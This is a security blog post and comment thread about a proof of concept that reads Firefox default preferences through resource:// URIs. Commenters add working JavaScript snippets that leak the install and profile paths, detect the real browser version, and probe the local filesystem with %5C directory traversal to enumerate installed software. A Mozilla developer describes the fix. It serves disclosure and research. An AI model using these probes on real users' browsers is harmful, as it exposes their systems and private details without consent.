web application security lab

Read Firefox Settings (PoC)

Sergey Vzloman sent me a really interesting proof of concept this morning on how you can read Firefox settings. It dumps all the browser settings into JavaScript space. Here’s the PoC code:

<script>
// Hook: the default-prefs files below are plain JavaScript made of
// pref("name", value); calls, so when they are loaded with <script src>
// every call resolves to this page-defined global pref() and the
// name/value pair is written into the document.
function pref(param,value){
document.write ("<b>"+param+"</b> = "+value+"")
};
</script>
<!-- Firefox's own default-prefs files, reachable through the resource: URI -->
<script src="resource://gre/greprefs/security-prefs.js"></script>
<script src="resource://gre/greprefs/all.js"></script>

So as you probably would have expected, I did add it to Mr. T (click for an example in Firefox) so that it would be included as well when you’re in the process of doing recon. Very cool, and obviously can be used to know in very fine detail what the user is using and what specialized security settings they may have installed. Tricky. Thanks to Sergey for the code!

33 Responses to “Read Firefox Settings (PoC)”

  1. Aviv Raff Says:

    You can also add:

    for the XPInstall settings.

  2. RSnake Says:

    Sorry, Aviv you must change < to &lt; to get it to go through. I was interested in your comment though.

  3. Jordan Says:

    That comment reminds me of a wonderful PoC I have against any browser. The following javascript will locally execute code on any browser that sees it, and can even bypass NoScript! If you’re reading this, it’s already too late:

    Ok, I’m kidding. Was I the only one reminded of Fermat’s last theorem when they read that comment as it is now? “I have a truly marvelous proof which unfortunately cannot bypass the site’s filters.”

    I’m such a dork.

  4. Kyran Says:

    Since when was there a digg button? (/diggs)
    Anyways, this is great. Really adds to the recon a person can do.

  5. Ronald van den Heetkamp Says:

    I wonder why the resource:// is limited to those two folders, anyone an idea?

  6. Tribute Says:

I tried the mr-t URL on Internet Explorer to see what it would do, if anything, and it crashed that window of IE. It is unresponsive to all input, including right-clicking the taskbar for that window.
I’d try it on Firefox but can’t be bothered to install it as I’m at college :\

  7. Jordan Says:

    Yeah, so back to actually contributing. I think what Aviv was pointing out is use the same pref overloading function and access xpinstall.js:

    resource://gre/greprefs/xpinstall.js

    Also — it’s possible to hijack new variable creation isn’t it? I never did get it working when playing with it a while back, but I seem to recall it being doable. If so, might also go after browserconfig.properties if there’s ever anything useful there.

    resource://gre/browserconfig.properties

  8. RSnake Says:

    kyran - id bugged me about it for long enough I finally added it. I hope it’s not too annoying.

Ronald - no clue! Probably a security measure, but I’m pretty sure knowing all that information is a security issue in and of itself anyway.

    Tribute - any idea which version of IE you were using and on what OS? Any special plugins?

  9. Boris Says:

    This just dumps out the default settings, not the user’s current settings. You could get the default settings just as easily by grabbing those files from ftp.mozilla.org.

  10. RSnake Says:

    Ugh, you’re right. I just changed keyword.URL in about:config to http://search.yahoo.com/search?ei=UTF-8&fr=sfp&fspl=1&p= (since I prefer Yahoo’s search anyway) and sure enough it didn’t change. :-/ Is there any value in knowing the default? Does it change in any interesting way from version to version that’s worth looking at? Time to take it out of Mr. T.

  11. Dan Veditz Says:

    Ronald– resource: is used by Mozilla code to load local install files without invoking the “chrome” system. Some mozilla embedding environments use the browser engine but don’t need or want XUL. It only reads from the install location because that’s all it needs to do; there’s no point in letting it walk around your disk if it doesn’t need to.

    RSnake– this should only get you the default settings, which for 99.99% of people are going to be the untouched defaults that ship with the browser. Maybe a few corporate deployments will install altered defaults, and you could pick those up this way, but you won’t read actual user settings.

  12. Bipin "3~" Upadhyay Says:

    I tried it (from the Mr. T link) with IE7 on WinXP.
    The output doesn’t really seem to be interesting; the browser didn’t crash though.

The first page load rendered “IE7.0 not detected”. (A refresh detected IE7 correctly.)
It also detected IE as the default browser, which it isn’t.
Interesting, isn’t it!

  13. RSnake Says:

    Dan - thanks, got it

    Bipin- I removed it from Mr T, so that output is no longer there.

  14. Aviv Raff Says:

    One thing useful (?) you can grab is the directory where FF is installed:

<LINK REL="stylesheet" href="resource://gre/" type="text/css" id="x" />
<script>
// the stylesheet's resolved href reveals the install directory
alert(document.getElementById("x").sheet.href);
</script>

  15. BK Says:

I was playing around with the various Firefox URIs a while back (including resource)… you can actually traverse back up the local file system by using a “%5c” (ex: resource:///..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5Cboot.ini). I actually had a POC that enumerated software from a user’s local filesystem using the Resource URI and the %5c traversals.

    IE has a similar problem (although slightly more complicated). I let MS know and they’ll be fixing it soon, but I guess the FF Resource URI is out of the bag!

    BK

  16. Aviv Raff Says:

Awesome finding, BK!
Can you explain how you enumerated the files?
As far as I know, you will need to use the resource URI in a readable object. Which one did you use?

Back to the pref function. Another useful bit of info is the real User Agent/current FF version:
<script>
// only react to the one pref that carries the build version
function pref(param,value){
if (param=="general.useragent.extra.firefox") {
alert("Your real FF version is: "+value)
}
};
</script>
<script src="resource://gre/defaults/pref/firefox.js"></script>

    This will bypass the “User Agent Switcher” add-on.

  17. CrYpTiC MauleR Says:

    Anyone think of making a Firekeeper rule to detect this?

  18. BK Says:

Aviv - Keep in mind that the Resource URI isn’t limited to .js files. It can be used to load other files as well. I simply used the resource URI to load javascript objects from the local file system. A simple example of this is using a javascript img object:

// "enum" is a reserved word in JavaScript, so the probe gets a plain name
var probe = new Image();
probe.src = "resource:///..%5C..%5C..%5Cpath-to-software%5Cknown-image-file";

from here.. I simply checked to see if the js object was loaded or not. I actually had a small DB of known files associated with various pieces of software that could be loaded into js objects. In some cases, you could actually determine the version of software installed.

Another dangerous item related to Resource, is you can actually control some of the contents in the first line of a Resource response. For example, if you use the dir traversal, you can actually place your content into the initial line.

ex: resource:///..%5C..%5CYOUR-CONTENT-HERE%5C..%5C

I was attempting to find the right mix of characters that could initiate a UXSS in the context of “resource” but I was unable to… maybe one of you can figure it out!

    BK

  19. Alex Says:

    This will give you the path of your current profile in Windows. Now you can regex the username from e.g. C:\documents and settings\bla\desktop\…..
    Works only locally so far.

<LINK REL="stylesheet" href="res%6Furce://..%5C" type="text/css" id="path">
<script>
// percent-encoded scheme plus one ..\ hop; the resolved href is the profile path
alert(document.getElementById("path").sheet.href);
</script>

  20. antichat Says:

    Can somebody find any bug in this site:
    http://forum.antichat.ru/

  21. Sergey Vzloman Says:

I tested the resource URI as a SCRIPT source for reading local files. Thanks to BK! My job is done :)

  22. eth00 Says:

    how to get data for example from:

    resource:///..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5Cboot.ini
    resource:///..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CProgram%20Files%5Cdesktop.ini

    ?

  23. Ronald van den Heetkamp Says:

    @Dan Veditz

Thanks for explaining, it seems that this all.js file is just a default install. I had a look at it, but I can’t find any juicy information. It shows that Javascript is enabled for instance, but that would fail if I have NoScript installed. Same with the locales, which can be changed with extensions. So my fair guess is it would generate a lot of false positives. And most of them are pretty standard, like white listing only addons.mozilla.org for extensions.

Cool hack though; if anyone can make it remotely really read other local files or Firefox session & cookie files, I’d be glad to hear :D

  24. Sergey Vzloman Says:

This example can be used to find installed extensions:

    Search plugins: (like google.xml, yandex.xml, wikipedia-ru.xml)
    c:\Program Files\Mozilla Firefox\searchplugins\google.xml

    Installed dictionaries:
    c:\..\dictionaries\ru.aff
    c:\..\dictionaries\en.aff

    Extension Plugins:
plugins\flashplayer.xpt
plugins\NPJava32.dll
plugins\QuickTimePlugin.class
plugins\ShockwavePlugin.class

  25. Dan Veditz Says:

    Enjoy resource:///..%5C while you can — it will soon stop working

    https://bugzilla.mozilla.org/show_bug.cgi?id=367428

    (test builds of 2.0.0.4 and 1.5.0.12 release candidates available at ftp.mozilla.org in the Firefox “nightly” directory)

  26. tribute Says:

    RSnake- I was running IE6 on Win Server 2003. No plugins.
    I tried it at home on IE6 with XP and its fine. So not sure what the crash was about. I’ll try it again next week in college if I remember.

  27. Ronald van den Heetkamp Says:

    @Dan Veditz

    To my knowledge: resource:///..%5C only works locally, not remotely. Correct me if I’m wrong.

  28. Otsego Says:

    Nope, doesn’t work. Error console gives this;
    Security Error: Content at http://ha.ckers.org/blog/20070516/read-firefox-settings-poc/#comments may not load or link to resource:///..%5C.

  29. Thor Larholm Says:

    Even if the directory traversal vulnerability here is fixed we can still read any file from inside the Firefox install directory. This includes update.xml, install.log or even browserconfig.properties - the latter of which contains your homepage settings.

    http://larholm.com/2007/05/25/firefox-0day-local-file-reading/

  30. ebook search Says:

    Hi there,

    guess there is no way to find out the users profile directory, is there?
    that would be a real security flaw…

    btw: what about background ajax file uploads? If you know/guess the location of specific files you can upload them to your server, your visitors won’t recognize it. Is there anything you can do to protect yourself from such an “attack”?

    -ebook searchr

  31. mob.dev Says:

Is it possible to steal cookies using an ajax background file-upload??

    I sketched a possible attack here (http://mobdev.tknerr.de/2007/06/01/cookie-stealing-using-ajax-backgound-file-upload/)

    I am sure this must have been discussed already, but IMHO this is still a big issue. Would be glad to hear your comments if the sketched attack is indeed so easily possible

    -ukio

  32. Alik Says:

    Great way to see FF plugins :)
    Do you think we can get what addons are installed for IE ?
    Perhaps we can see if IE responds to certain file types that addons interacts with and by that know what addons are installed, for example flash (.swf) ?
    What do you think ?

  33. Internet Threat Says:

It’s pretty easy to produce; I have coded my own script out of your method and it’s very useful.